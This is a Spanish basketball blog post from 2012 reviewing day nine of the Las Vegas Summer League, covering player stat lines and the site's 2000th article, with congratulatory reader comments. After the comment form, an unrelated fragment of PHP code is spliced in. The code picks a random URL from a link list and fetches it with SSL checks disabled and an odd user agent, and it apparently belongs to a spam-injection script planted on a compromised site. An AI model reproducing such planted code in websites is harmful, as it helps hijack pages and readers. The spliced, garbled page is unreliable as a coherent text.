Las Vegas Summerleague: Día 9

18 de July de 2012 por txusma

Hoy como siempre vamos a repasar lo que ha dado de sí la Summerleague pero antes permitidme que os informe que este artículo es el número 2000 que publicamos en tjnba.com. 2000 artículos… No sé si alguien pensaba hace 5 años cuando publicamos el análisis de los Milwaukee Bucks de la temporada 2007-2008, que 5 años después publicaríamos nuestro artículo número 2000. Gracias a todos por aguantarnos, por participar y por colaborar. Estaremos por aquí mientras el cuerpo aguante.

Y después de la cuña publicitaria vamos ya con la novena jornada de Summerleague.

Destacados

Houston Rockets: Un día más, un grupo de jugadores de los Rockets nos deja con la boca abierta. Donatas Motiejunas, 20 puntos y 12 rebotes, Jeremy Lamb, 23 puntos y 6 rebotes, Terrence Jones, 24 puntos y 12 rebotes, y Royce White, 6 puntos, 12 rebotes y 8 asistencias. El primer año en la NBA será duro pero ¿qué pueden ofrecer a largo plazo?

Damien Lillard & Nolan Smith: Los Blazers la clavaron cogiendo a Lillard en el número 6. Tras anotar 25 puntos el primer día, ayer anotó 27, que adornoó con 5 rebotes y 3 asistencias. Será uno de los bases anotadores del futuro. Su compañero se fue también a los 27 puntos, en una buena serie de tiro (10 de 16) y aportando en varias facetas (5 rebotes, 5 asistencias, 2 robos). Desgraciadamente, tuvo que ser retirado en camilla a falta de 40 segundos para el final, tras golpearse con la canasta.

Kenneth Faried & Justin Hamilton: Se trata de 2 jugadores con experiencia NBA que están disfrutando de la lindo. El primero se hizo amo y señor de las zonas con 16 puntos, 15 rebotes y 5 tapones. El segundo se fue a los 21 puntos, a los que sumó 8 rebotes.

Josh Selby: Ya nos había dejado algun buen partido pero ayer explotó definitivamente. Se fue a los 35 puntos y 7 robos, jugando más bien de escolta. ¿Aprovechará los minutos que deje OJ Mayo?

Kawhi Leonard: ¡Déjenle volver a casa! El jugador de los Spurs demostró que está muy por encima del jugador medio de esta summerleague con 27 puntos, 8 rebotes y una superioridad insultante.

Markieff Morris: Otro jugador con bastante experiencia NBA. El alero de los Suns fue el mejor de su equipo con 24 puntos y 17 rebotes. Viendo los compañeros que tiene no extraña que se jugara 21 tiros.

Byron Mullens: ¿Va en serio o no lo de Mullens? Con 33 puntos y 8 rebotes se comió a todo pívot rival que se le puso delante.

A seguir

Evan Fournier: 14 puntos pero 7 faltas y 4 pérdidas. Necesita mejorar.

Cory Joseph: Otro buen partido del base de los Spurs. Está anotando bastante bien desde fuera y parece un calco (salvando las siderales distancias) de Tony Parker. Tiene buen maestro. Acabó con 18 puntos, 5 asistencais y 3 robos.

Dion Waiters: Fue el máximo anotador de los Cavs con 16 puntos pero sigue muy fallón (5 de 15).

Tyler Zeller: Sólido una vez más. Doble-doble de 10 puntos y 12 rebotes.

Derrick Williams & Wesley Johnson: El primero anotó 17 puntos y capturó 7 rebotes pero sigue sin afinar en el tiro de 3, algo muy necesario si quiere tener minutos en los Wolves. El segundo se fue a los 24 puntos pero no aportó mucho más al equipo.

Kemba Walker: Mejorando. 15 puntos, 4 rebotes, 8 asistencias, 2 robos pero un 5 de 15 en tiros de campo. Lo mejor, que solo perdió 1 balón.

Decepciones

Meyers Leonard: Jones y Motiejunas le sujetaron bien y se quedó en 8 puntos y 4 rebotes.

Tony Wroten: Tras dejarnos con la boca abierta el primer día, Wroten hizo caer a los fans de los Grizzlies al mundo terrenal. Jugó 15 minutos pero para lo que aportó (5 puntos con un 2 de 9 en tiro) casi mejor que no jugara más.

Bradley Beal: Hasta el día de ayer, el escolta de los Wizards se había mostrado muy regular. Por fin, nos dejó un mal partido que demuestra que es un rookie. Acabó con 15 puntos pero con un 5 de 15 en tiros de campo y fue superado por Selby en todos los aspectos.

Comenta

8 comentarios a esta entrada

  1. Melo15 dice:
    #1

    Como veo cualquier partido de la Summer League?

      Citar

  2. Sancho88 dice:
    #2

    Piyas un avión a Las Vegas, entras en el casino Palm, te haces amigo de chinos expertos en máquinas tragaperras, les robas a los Maloof con la ayuda de estos chinos (no se van a dar cuenta, son inútiles) y con lo que saques te piyas asiento preferente en la cancha para ver a Fredette, Morrison, Al Thornton y demás maravillas de la naturaleza.

    No, en serio melo, no conoces el streaming aún? firstrow, rojadirecta… hay un montón de páginas

      Citar

  3. Sempren dice:
    #3

    ¡Enhorabuena por esos 2000 artículos! Informarnos hasta de la Summer League… sois enormes!

      Citar

  4. The wolf dice:
    #4

    Enhorabuena por el artículo 2000 de parte de un lector que lleva más de 4 años visitando este blog todas las mañanas y muchas gracias por hacer lo que haceis… que estoy convencido es un trabajo complicado

      Citar

  5. rumbero dice:
    #5

    Felicidades por los 2000! Casi nada. A seguir asi que es un lujo entrar en un blog de calidad para ponerse al día y leer los comentarios (o mini relatos en el caso de Sancho) de los sabios del lugar.

      Citar

  6. jose antonio ramirez dice:
    #6

    Muchas felicidades por los 2000 articulos. Espero que nunca acaben. Por mi parte espero contribuir con muchos mas.

      Citar

  7. Ru dice:
    #7

    Grandes como pocos,a seguir creciendo y un servidor con vosotros! ¡Feliz 2000!

      Citar

  8. JHC dice:
    #8

    2000 articulos valla pasada, muchas felicidades por el blog y espero que siga leyendo estos pedazos de articulos durante muchos años

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>